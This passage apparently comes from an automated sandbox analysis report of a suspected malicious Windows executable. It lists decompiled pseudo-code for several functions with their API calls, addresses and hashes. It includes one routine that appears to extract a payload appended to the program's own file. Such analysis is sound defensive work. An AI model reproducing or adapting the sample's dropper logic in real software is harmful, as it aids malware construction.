				return E00403184(_t13, _t6, _t14);
			}







                                                                          0x00404f3c
                                                                          0x00404f52
                                                                          0x00404f6a

                                                                          APIs
                                                                          • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: NamePathShort
                                                                          • String ID:
                                                                          • API String ID: 1295925010-0
                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}







                                                                          0x00404b68
                                                                          0x00404b68
                                                                          0x00404b6a
                                                                          0x00404b70
                                                                          0x00404b75
                                                                          0x00404b77
                                                                          0x00404b77
                                                                          0x00404b88
                                                                          0x00404b8d

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                          0x0040401b
                                                                          0x00404023
                                                                          0x0040402e
                                                                          0x00404034

                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateMutex
                                                                          • String ID:
                                                                          • API String ID: 1964310414-0
                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404EB0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00404EB0(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                          0x00404ebd
                                                                          0x00404ec5
                                                                          0x00404ec9

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                          • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                                          • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                          • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}







                                                                          0x00404ba2
                                                                          0x00404ba7
                                                                          0x00404ba7
                                                                          0x00404ba8
                                                                          0x00000000
                                                                          0x00404bad
                                                                          0x00404bb0

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                          • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404CF8, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404CF8(CHAR* __eax) {
				long _t4;
				void* _t5;
				void* _t9;

				_t4 = GetFileAttributesA(__eax); // executed
				_t5 = _t4 + 1;
				_t9 = _t5;
				if(_t9 != 0) {
					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
				}
				return _t5;
			}






                                                                          0x00404cf9
                                                                          0x00404cfe
                                                                          0x00404cfe
                                                                          0x00404cff
                                                                          0x00000000
                                                                          0x00404d04
                                                                          0x00404d07

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                          • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                                          • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                          • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}




                                                                          0x00404bbc
                                                                          0x00404bc1

                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x641e7c
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x40a5b0 = 1;
						}
						E00401184(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                          0x00401380
                                                                          0x00401383
                                                                          0x00401387
                                                                          0x0040138a
                                                                          0x00401394
                                                                          0x00401398
                                                                          0x0040139f
                                                                          0x004013a3
                                                                          0x004013fc
                                                                          0x004013ab
                                                                          0x004013ad
                                                                          0x004013b2
                                                                          0x004013c3
                                                                          0x004013c5
                                                                          0x004013c5
                                                                          0x004013cb
                                                                          0x004013d2
                                                                          0x004013d4
                                                                          0x004013d4
                                                                          0x004013e0
                                                                          0x004013e7
                                                                          0x004013e9
                                                                          0x004013e9
                                                                          0x004013f5
                                                                          0x004013f5
                                                                          0x004013fa
                                                                          0x004013fa
                                                                          0x00401404
                                                                          0x0040140a
                                                                          0x00401411
                                                                          0x0040141b
                                                                          0x00401421
                                                                          0x00401429
                                                                          0x00000000
                                                                          0x00401429
                                                                          0x00401433

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x641e7c
				while(_t29 != 0x40a5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                          0x0040143b
                                                                          0x0040143f
                                                                          0x00401446
                                                                          0x0040145b
                                                                          0x00401463
                                                                          0x00401469
                                                                          0x0040146f
                                                                          0x00401472
                                                                          0x004014b6
                                                                          0x0040147a
                                                                          0x00401480
                                                                          0x00401484
                                                                          0x00401486
                                                                          0x00401486
                                                                          0x0040148c
                                                                          0x0040148e
                                                                          0x0040148e
                                                                          0x00401494
                                                                          0x004014a1
                                                                          0x004014a8
                                                                          0x004014aa
                                                                          0x004014b0
                                                                          0x00000000
                                                                          0x004014b0
                                                                          0x004014a8
                                                                          0x004014b4
                                                                          0x004014b4
                                                                          0x004014c5

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x641e7c
				while(_t19 != 0x40a5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                          0x004014cc
                                                                          0x004014dd
                                                                          0x004014e4
                                                                          0x004014ed
                                                                          0x004014f1
                                                                          0x004014f4
                                                                          0x004014f7
                                                                          0x00401537
                                                                          0x004014ff
                                                                          0x00401505
                                                                          0x0040150a
                                                                          0x0040150c
                                                                          0x0040150c
                                                                          0x00401511
                                                                          0x00401513
                                                                          0x00401513
                                                                          0x00401517
                                                                          0x00401522
                                                                          0x00401529
                                                                          0x0040152b
                                                                          0x0040152b
                                                                          0x00401529
                                                                          0x00401535
                                                                          0x00401535
                                                                          0x00401544

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,0040172F), ref: 00401522
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004070DC, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040712D);
				return E00403094( &_v8);
			}






                                                                          0x004070df
                                                                          0x004070e3
                                                                          0x004070e4
                                                                          0x004070e9
                                                                          0x004070ec
                                                                          0x004070f4
                                                                          0x0040710b
                                                                          0x00407112
                                                                          0x00407115
                                                                          0x00407118
                                                                          0x00407125

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: MZP
                                                                          • API String ID: 514040917-2889622443
                                                                          • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                          • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                                          0x00404b91
                                                                          0x00404b9b

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407678, Relevance: .1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 52%
                                                                          			E00407678(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v40254;
				char _v41488;
				char _v41492;
				char _v41496;
				intOrPtr _v41500;
				char _v41504;
				char _v41508;
				char _v41512;
				char _v41516;
				intOrPtr _v41520;
				char _v41524;
				char _v41528;
				char _v41532;
				char _v41536;
				void* _t49;
				void* _t101;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;

				_t100 = __ebx;
				_t137 = _t138;
				_t101 = 0x144b;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t139 = _t101;
				} while (_t101 != 0);
				_push(_t101);
				_push(_t137);
				_push(0x40798c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41492, __ebx, _t101);
				_push( &_v41492);
				E004031F4( &_v41496, 9, 0x4091b4);
				_pop(_t49);
				E00403214(_t49, _v41496);
				E00404DE0(_v41492, __ebx); // executed
				E00405008( &_v41504, __ebx, 9);
				_push(_v41504);
				E004031F4( &_v41508, 9, 0x4091b4);
				_push(_v41508);
				E004031F4( &_v41512, 3, 0x4091dc);
				_push(_v41512);
				E004032CC();
				E00405200(_v41500, __ebx, __esi, _t139); // executed
				E004049D0(0, _t100,  &_v41516, __edi, __esi);
				_v8 = E00405B60(_v41516,  &_v41516);
				_push(_t137);
				_push(0x40789f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41524, _t100, 3);
				_push(_v41524);
				E004031F4( &_v41528, 9, 0x4091b4);
				_push(_v41528);
				E004049D0(0, _t100,  &_v41536, __edi, __esi);
				E00404ED0(_v41536,  &_v41532);
				_push(_v41532);
				E004032CC();
				_v12 = E00405B24(_v41520, 0x40000103);
				_push(_t137);
				_push(0x407882);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E0040597C(_v8);
				E00405974();
				E00405988(_v8);
				E0040254C( &_v40254, 4,  &_v16);
				E00407080( &_v41488, _v16, 0x3e8);
				E0040598C(_v12);
				E00405974();
				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
				_pop(_t133);
				 *[fs:eax] = _t133;
				_push(E00407889);
				return E00404520(_v12);
			}

























                                                                          0x00407678
                                                                          0x00407679
                                                                          0x0040767b
                                                                          0x00407680
                                                                          0x00407680
                                                                          0x00407682
                                                                          0x00407684
                                                                          0x00407684
                                                                          0x00407684
                                                                          0x00407687
                                                                          0x0040768a
                                                                          0x0040768b
                                                                          0x00407690
                                                                          0x00407693
                                                                          0x0040769c
                                                                          0x004076a7
                                                                          0x004076b8
                                                                          0x004076c3
                                                                          0x004076c4
                                                                          0x004076cf
                                                                          0x004076da
                                                                          0x004076df
                                                                          0x004076f5
                                                                          0x004076fa
